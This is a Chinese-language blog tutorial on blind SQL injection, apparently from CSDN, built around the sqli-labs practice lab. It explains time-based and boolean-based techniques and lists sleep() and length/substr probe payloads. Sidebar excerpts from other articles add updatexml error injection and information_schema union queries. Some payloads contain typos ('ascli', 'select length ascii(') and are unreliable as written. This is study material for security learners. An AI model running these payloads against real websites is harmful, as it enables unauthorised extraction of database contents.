SQL注入实战:盲注

已于 2024-07-10 14:07:29 修改
阅读量756 收藏 10
点赞数 8
分类专栏: 网络安全攻防基础 文章标签: sql oracle 数据库
于 2024-01-20 14:32:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ting_liang/article/details/135714594
版权

盲注:

1、当攻击者利用SQL注入漏洞进行攻击时,有时候web应用程序会显示,后端数据库执行SQL查询返回的错误信息,这些信息能帮助进行SQL注入,但更多时候,数据库没有输出数据web页面,这是攻击者会查询一系列的true或false问题,或者基于时间判断的问题,强制从数据库获取数据。

2、Blind SQL(盲注)是注入攻击的其中一种,向数据库发送true或false这样的问题,并根据应用程序返回的信息判断结果,这种攻击的出现是因为应用程序配置为只显示常规错误,并不显示sql语句的错误,这种情况并没有解决SQL注入存在的代码问题。

3、盲注可以分为基于不二的盲注和基于事件的盲注

一:基于时间的盲注

1、延时注入,用的最多的注入

2、常用的判断语句:

' and if(1=0,1,sleep(10)) --+ 

" and if(1=0,1,sleep(10)) --+

) and if(1=0,1,sleep(10)) --+

') and if(1=0,1,sleep(10)) --+

") and if(1=0,1,sleep(10)) --+

利用if(条件,0,1)函数,当条件为真返回0,假则返回1

sqli-lab 9-10实验就是基于时间的盲注

?id=1' and if(ascli(substr(database(),1.1))=115,sleep(5),1)--+

二:基于布尔的盲注

基于布尔型的盲注,我们通常采用下面的方法猜解字符串,

select length(database());

select substr(database(),1,1);

select length ascii(substr(database(),1,1);

select length ascii(substr(database(),1,1)>N;

select length ascii(substr(database(),1,1)=N;

select length ascii(substr(databa

se(),1,1)<N;

输入:?id=1

输入:?id=1'

输入:?id=1' and length(database())=8 --+       (查看数据库的长度)

把=8改成=9,会发现没有了        (说明数据库长度为8)

ting~liang
关注
专栏目录
SQL 注入-盲注
Cwillchris的博客
06-04 336
超详细盲注原理讲解
《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 9444
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
sql注入盲注
2301_80913334的博客
04-15 1344
sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。简单来说就是页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实现sql注入。web页面只返回True,False两种值。利用页面返回不同,逐个猜解数据1、布尔盲注不推荐使用手注但也需要了解其payload的构造;
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
SQL注入盲注
xiao_he0123的博客
03-20 7323
SQL注入盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
sql注入盲注
2302_79119987的博客
04-23 2342
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL注入实战盲注sqlmap运用解析
4. 布尔盲注: 对于DVWA靶机中的sqlinjection(Blind)模块,攻击者利用布尔型盲注来确定数据库名字的长度以及其具体名称。通过发送精心构造的SQL查询并观察服务器响应时间的变化,攻击者可以逐个字符地猜出数据库...
SQL注入攻防:盲注数据库暴库实战解析
在【标题】"SQL注入技巧-盲注暴库详细技巧及实例"中,作者分享了自己通过研究和实战经验总结出的几种SQL盲注方法。盲注是指在没有直接返回结果的情况下,通过判断性条件推测数据库信息的技术。 1. **布尔盲注**...
《网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 9339
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
《WEB安全渗透测试》(4)SQL注入实战:时间盲注
午夜安全
10-02 8194
《WEB安全渗透测试》(4)SQL注入实战:时间盲注 时间盲注:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。1)考虑使用时间盲注访问URL:http://www.tianchi.com/web/time.php?id=1返回yes......
SQL注入——盲注
weixin_74991270的博客
10-10 244
掌握盲注基本的操作多多练习,手工注入+sqlmap跑。
sql注入-盲注
weixin_36591264的博客
12-06 3279
学习内容: 布尔盲注 时间盲注 报错盲注 SQL注入-盲注学习内容:前言一、基于布尔盲注二、基于时间盲注三、基于报错盲注 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 •基于布尔 SQL 盲注 •基于时间的 SQL 盲注 •基于报错的 SQL 盲注 注:使用靶场:sqli-labs 靶场下载地址:https
SQL注入---盲注
zhoutong2323的博客
04-05 820
注是一种SQL注入攻击的形式,在这种攻击中,攻击者向目标应用程序发送恶意注入代码,然后通过观察应用程序的响应来推断出数据库中的信息。与常规的SQL注入攻击不同的是,盲注攻击是页面不会将报错信息回显以及没有明显回显位的情况下,页面不直接返回任何有关数据库的具体错误信息,导致攻击者无法直接获得数据库中的数据。盲注可以分为基于布尔逻辑的盲注和基于时间的盲注两种形式。基于布尔逻辑的盲注:攻击者通过在恶意注入代码中利用布尔逻辑运算符(如AND、OR)来判断条件是否为真,从而推断出数据库中的信息。例如,攻击者可以通过尝
sql注入盲注
inslight的博客
09-23 306
布尔型盲注 1.布尔型盲注(以SQLi-LABS Page-1(Basic Challenges) less8 为例子) 判断 布尔型盲注详情 时间盲注
SQL注入--盲注
qq_45776756的博客
11-30 3681
一、盲注 盲注就是在注入过程中,获取的数据不能返回到前端页面,此时,我们需要利用一些方法来进行判断或者尝试。 二、分类 1.布尔盲注——逻辑判断(不回显,接着使用) 2.时间盲注——延时判断(不回显,最后使用,效率最慢) 3.报错型盲注——报错回显(强制报错回显,优先使用,效率快) 三、 1.报错注入(updatexml类型) ' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); 其中0x7e是ASCII编码,解码结果为~。
SQL注入盲注
4ut15m's blog
02-03 645
其他相关文章: SQL注入基础 报错注入 盲注 用于页面注入无回显并且不会打印错误信息的情况. 盲注类型 布尔型盲注,延时盲注 布尔型盲注 注入页面虽然无回显,但是根据注入造成的不同布尔值(true与false)页面会有不同的结果这便是布尔型盲注. if函数:if(condition, value_if_true, value_if_false),condition为判断条件,参...
SQL注入之-盲注
走在成功路上的博客
11-24 1404
SQL注入之-盲注前言盲注流程 前言 Tips: 后续根据本人认知体系不断壮大会持续更新 QAQ 首先了解几个需要的函数: 1. A = SBUSTR(str,pos); 2. B = LENGTH() 3. C = IF(expr1,expr2,expr3) 4. D = SLEEP(time) A 作用: 就是从pos开始的位置,一直截取到最后。 B 作用: 用于获取对应字段的字符长度。...
sql注入盲注语句大全
09-16
SQL注入盲注语句大全包括基于布尔的SQL盲注和基于时间的SQL盲注两种类型。基于布尔的SQL盲注可以使用以下语句: 1. 判断是否存在:1' and [条件]-- (如果条件满足,页面会返回正常,否则页面不会有改变) 例如:1' and '1'='1-- (页面返回正常) 1' and '1'='2-- (页面不会有改变) 2. 获取数据库信息:1' or [查询语句]-- (如果查询语句返回结果,则页面会返回正常,否则页面不会有改变) 例如:1' or 1=1 union select database()-- (获取当前数据库的名称) 1' or 1=1 union select table_name from information_schema.tables where table_schema='database_name'-- (获取指定数据库的所有表名) 基于时间的SQL盲注可以使用以下语句: 1. 延时查询:1' and sleep([延时时间])-- (如果延时时间较长,页面会延迟返回结果) 例如:1' and sleep(10)-- (页面会延迟10秒返回结果) 需要注意的是,在使用SQL注入盲注语句时,应根据具体情况进行修改和适配,以达到获取所需信息的目的。同时,为了避免对目标系统造成不必要的损失,建议在合法授权和控制下,仅在安全测试和授权渗透测试中使用这些技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ting~liang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值